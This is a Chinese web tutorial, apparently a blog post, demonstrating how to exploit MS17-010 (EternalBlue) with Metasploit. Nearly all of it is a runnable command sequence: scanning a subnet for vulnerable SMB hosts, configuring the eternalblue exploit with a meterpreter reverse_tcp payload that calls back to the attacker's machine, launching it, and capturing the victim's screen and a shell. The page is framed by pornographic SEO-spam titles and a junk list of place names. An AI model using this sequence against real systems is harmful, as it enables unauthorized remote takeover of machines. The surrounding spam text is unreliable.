91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

使用MSF對MS17-010的利用演示

發布時間:2020-06-24 01:57:07 來源:網絡 閱讀:18342 作者:1inux 欄目:安全技術

過程:

    1、掃描: 信息搜集(刺探)

    2、漏洞利用


一、首先檢測網段內存在漏洞的主機系統:

使用命令:

msf > use auxiliary/scanner/smb/smb_ms17_010        //加載掃描exp
msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.22.1/24    //配置掃描網段
msf auxiliary(scanner/smb/smb_ms17_010) > run        //進行掃描

結果如下:

使用MSF對MS17-010的利用演示

二、漏洞利用

msf利用命令如下:

msf > use exploit/windows/smb/ms17_010_eternalblue          //加載***模塊
msf exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.22.25      //配置***目標IP
RHOSTS => 192.168.22.25
msf exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.5.146        //配置本機IP
LHOST => 192.168.5.146
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp     //配置回鏈方式
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/smb/ms17_010_eternalblue) >

查看當前配置的payload

msf exploit(windows/smb/ms17_010_eternalblue) > show options    //查看配置選項

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               192.168.22.25    yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.5.146    yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(windows/smb/ms17_010_eternalblue) >


發起***:

***命令: 
msf exploit(windows/smb/ms17_010_eternalblue) > exploit        //發起***

使用MSF對MS17-010的利用演示

獲取對方電腦桌面:

meterpreter > screenshot
Screenshot saved to: /root/RBDEvfGv.jpeg    //可以到root目錄下 查看對方電腦的截屏

獲取shel權限

使用MSF對MS17-010的利用演示

有關更多獲取權限后的***技巧, 請自行百度  msf 后*** ***模塊

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

沅陵县| 滕州市| 齐齐哈尔市| 镇巴县| 无棣县| 织金县| 玉溪市| 镇原县| 印江| 拜城县| 德昌县| 皮山县| 新龙县| 巫山县| 佛山市| 调兵山市| 宽甸| 田东县| 中阳县| 兴文县| 巴彦淖尔市| 安西县| 大庆市| 那坡县| 青海省| 庆安县| 南城县| 紫金县| 海兴县| 禄劝| 灵丘县| 红安县| 忻城县| 黄陵县| 和政县| 房山区| 青河县| 收藏| 金沙县| 茌平县| 开原市|